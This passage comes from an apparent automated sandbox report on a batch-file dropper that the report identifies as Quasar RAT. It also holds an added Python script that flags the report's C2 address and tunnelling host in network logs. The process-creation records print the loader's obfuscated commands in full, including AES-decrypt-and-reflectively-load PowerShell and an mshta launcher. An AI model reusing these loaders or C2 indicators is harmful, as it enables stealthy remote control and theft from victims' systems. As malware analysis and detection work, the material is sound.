            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: lsass.exe, 00000018.00000002.3364189171.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485797316.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
            Source: lsass.exe, 00000018.00000000.2485644679.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361810056.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
            Source: lsass.exe, 00000018.00000000.2485971578.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366282743.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3367690216.000002D6F0E11000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3365446317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486093727.000002D6F0E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3364189171.000002D6F0C45000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485797316.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485919317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: lsass.exe, 00000018.00000000.2486056808.000002D6F0DCD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.c
            Source: lsass.exe, 00000018.00000000.2485919317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
            Source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABC7D1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000013.00000002.3357613110.000001F58009C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: lsass.exe, 00000018.00000000.2485644679.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361810056.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, cscript.exe, 0000001C.00000002.3371306184.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001C.00000000.2515366668.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
            Source: $sxr-powershell.exe, 00000013.00000002.3357613110.000001F58004F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
            Source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABC7D1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000013.00000002.3357613110.000001F580074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
            Source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCFF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown | DNS traffic detected: queries for: throbbing-mountain-09011.pktriot.net
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
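The network indicators above (a TCP session from 192.168.2.6:49716 to 167.71.56.116:22112 and DNS queries for throbbing-mountain-09011.pktriot.net) are easiest to operationalise by correlating connection records with DNS answers, so that a connection can be judged by the name that produced it and not only by the bare address. The script below is an added example, not Joe Sandbox output and not part of the sample. Its log lines are constructed in a Zeek-like tab-separated layout; the DNS answer mapping the pktriot host to 167.71.56.116 is an assumption this report does not state, and the tunnelling-suffix and common-port lists are tuning assumptions, not report data.

```python
"""Correlate connection records with DNS answers and flag the network
indicators recorded in this report. Added example; log lines are constructed."""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

IOC_IPS = {ipaddress.ip_address("167.71.56.116")}      # from the report
IOC_HOSTS = {"throbbing-mountain-09011.pktriot.net"}   # from the report
# Assumption: the monitored environment has no business use for Packetriot tunnels.
TUNNEL_SUFFIXES = (".pktriot.net",)
# Assumption: ports treated as ordinary for outbound TCP.
COMMON_PORTS = {22, 25, 53, 80, 123, 443, 445, 587, 853, 993, 995, 3389}

# Constructed conn.log rows: ts  uid  proto  orig_h  orig_p  resp_h  resp_p
CONN_LOG = """\
1.0\tC1\tudp\t192.168.2.6\t51234\t1.1.1.1\t53
2.0\tC2\ttcp\t192.168.2.6\t49716\t167.71.56.116\t22112
3.0\tC3\ttcp\t192.168.2.6\t49720\t203.0.113.10\t443
"""
# Constructed dns.log rows: ts  uid  orig_h  query  qtype  answer
# (the pktriot -> 167.71.56.116 answer is assumed, not taken from the report)
DNS_LOG = """\
1.5\tD1\t192.168.2.6\tthrobbing-mountain-09011.pktriot.net\tA\t167.71.56.116
2.5\tD2\t192.168.2.6\tupdates.example.net\tA\t203.0.113.10
"""


@dataclass
class Conn:
    uid: str
    proto: str
    src: ipaddress.IPv4Address | ipaddress.IPv6Address
    sport: int
    dst: ipaddress.IPv4Address | ipaddress.IPv6Address
    dport: int


def parse_dns(text: str) -> dict:
    """Map each answered IP address to the set of names that resolved to it."""
    resolved: dict = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, _uid, _src, query, _qtype, answer = line.split("\t")
        try:
            ip = ipaddress.ip_address(answer)
        except ValueError:          # CNAME / NXDOMAIN rows carry no address
            continue
        resolved.setdefault(ip, set()).add(query.lower().rstrip("."))
    return resolved


def parse_conn(text: str) -> list[Conn]:
    """Parse tab-separated connection rows into Conn records."""
    conns = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, uid, proto, src, sport, dst, dport = line.split("\t")
        conns.append(Conn(uid, proto, ipaddress.ip_address(src), int(sport),
                          ipaddress.ip_address(dst), int(dport)))
    return conns


def assess(conn: Conn, resolved: dict) -> list[str]:
    """Return the reasons a connection is suspicious; empty list means clean."""
    reasons = []
    names = resolved.get(conn.dst, set())
    if conn.dst in IOC_IPS:
        reasons.append(f"known C2 address {conn.dst}")
    for name in sorted(names):
        if name in IOC_HOSTS:
            reasons.append(f"resolved from known C2 host {name}")
        if name.endswith(TUNNEL_SUFFIXES):
            reasons.append(f"resolved from tunnelling-provider host {name}")
    # A public destination that no DNS answer ever named points at a hard-coded
    # address; DNS itself (port 53) is excluded because resolvers are reached by IP.
    if not names and conn.dport != 53 and not conn.dst.is_private:
        reasons.append("destination never appeared in a DNS answer (hard-coded IP)")
    if conn.proto == "tcp" and conn.dport not in COMMON_PORTS:
        reasons.append(f"uncommon destination port {conn.dport}")
    return reasons


def run(conn_log: str, dns_log: str) -> dict[str, list[str]]:
    """Map each flagged connection uid to its reasons."""
    resolved = parse_dns(dns_log)
    return {c.uid: r for c in parse_conn(conn_log) if (r := assess(c, resolved))}


if __name__ == "__main__":
    for uid, reasons in run(CONN_LOG, DNS_LOG).items():
        print(uid, "->", "; ".join(reasons))
```

On the constructed data only C2 is flagged, with four reasons: the literal IOC address, the literal IOC hostname, the tunnelling-provider suffix, and the non-standard port 22112. The last two are the signals that survive when the operator moves to a new pktriot subdomain or a new DigitalOcean droplet.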

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Windows\$sxr-powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\$sxr-powershell.exe

            E-Banking Fraud

            Source: Yara match | File source: Process Memory Space: $sxr-powershell.exe PID: 6400, type: MEMORYSTR

            System Summary

            Source: 15.2.$sxr-powershell.exe.1facd584ef8.29.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT Author: Florian Roth
            Source: 15.2.$sxr-powershell.exe.1facd584ef8.29.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT Author: Florian Roth
            Source: 0000000F.00000002.3570248897.000001FACD23D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT Author: Florian Roth
            Source: Shadow-Stealer.bat | Static file information: 13144733
            Source: C:\Windows\$sxr-powershell.exe | Network Connect: 167.71.56.116 22112
            Source: C:\Windows\$sxr-cmd.exe | Process created: Commandline size = 7207
            Source: C:\Windows\$sxr-powershell.exe | Process created: Commandline size = 7313
            Source: C:\Windows\$sxr-cmd.exe | Code function: 13_2_00007FF7137F4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList
            Source: C:\Windows\$sxr-mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\$sxr-mshta.exe | Section loaded: sfc.dll
            Source: 15.2.$sxr-powershell.exe.1facd584ef8.29.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 15.2.$sxr-powershell.exe.1facd584ef8.29.raw.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0000000F.00000002.3570248897.000001FACD23D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | File created: C:\Windows\$sxr-powershell.exe
            Source: C:\Windows\$sxr-cmd.exe | Code function: 13_2_00007FF7137F88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
            Source: C:\Windows\$sxr-cmd.exe | Code function: 13_2_00007FF71380BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
            Source: C:\Windows\$sxr-cmd.exe | Code function: 13_2_00007FF7137F8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
            Source: C:\Windows\$sxr-cmd.exe | Code function: 13_2_00007FF7137F7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
            Source: C:\Windows\$sxr-cmd.exe | Code function: 13_2_00007FF7137F89E4 NtQueryInformationToken,NtQueryInformationToken
            Source: C:\Windows\$sxr-cmd.exe | Code function: 13_2_00007FF713811538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
            Source: C:\Windows\$sxr-cmd.exe | Code function: 13_2_00007FF7137E3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
            Source: C:\Windows\$sxr-cmd.exe | Code function: 13_2_00007FF7137F898C NtQueryInformationToken
            Source: C:\Windows\System32\winlogon.exe | Code function: 22_2_000002D0165E2AF4 NtEnumerateValueKey,OpenMutexW,CloseHandle,FindCloseChangeNotification,NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\dllhost.exe | Code function: 23_2_004015C1 OpenProcess,NtQueryInformationProcess,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle
            Source: C:\Windows\System32\lsass.exe | Code function: 24_2_000002D6F1512744 NtQueryDirectoryFileEx,GetFileType,StrCpyW
            Source: C:\Windows\System32\lsass.exe | Code function: 24_2_000002D6F151221C NtQuerySystemInformation,StrCmpNIW
            Source: C:\Windows\System32\dwm.exe | Code function: 26_2_000001D15B492AF4 NtEnumerateValueKey,OpenMutexW,CloseHandle
            Source: C:\Windows\$sxr-cmd.exe | Code function: 13_2_00007FF7137E5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z
            Source: Shadow-Stealer.bat.exe, 00000003.00000000.2146671454.00007FF6C0029000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Shadow-Stealer.bat
            Source: Shadow-Stealer.bat.exe.0.dr | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Shadow-Stealer.bat
            Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\Desktop\Shadow-Stealer.bat.exe
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winBAT@52/13@1/1
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\$sxr-cmd.exe | Code function: 13_2_00007FF7137E32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError
            Source: C:\Windows\System32\dllhost.exe | Code function: 20_2_0000000140001B30 LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification,FindResourceA,RegCreateKeyExW,RegSetKeySecurity,RegCreateKeyExW,RegSetValueExW,RegCloseKey,CreateThread,CreateThread,SleepEx
            Source: C:\Windows\$sxr-powershell.exe | Anti Malware Scan Interface:
            Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Shadow-Stealer.bat" "
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | File read: C:\Users\user\Desktop\Shadow-Stealer.bat
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Shadow-Stealer.bat" "
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\Desktop\Shadow-Stealer.bat.exe "Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2ca74e05-00fd-4f33-afb0-1baa728859ba}
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{a795ed5e-f9f8-4b9c-9e39-bf732c676d16}
            Source: unknown | Process created: C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3885b722-1a15-44b5-b09d-ff91e5413f87}
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{99a849d9-b898-48bd-a9ae-8d2739f763c9}
            Source: C:\Windows\$sxr-mshta.exe | Process created: C:\Windows\$sxr-cmd.exe "C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
            Source: C:\Windows\$sxr-cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\$sxr-cmd.exe | Process created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 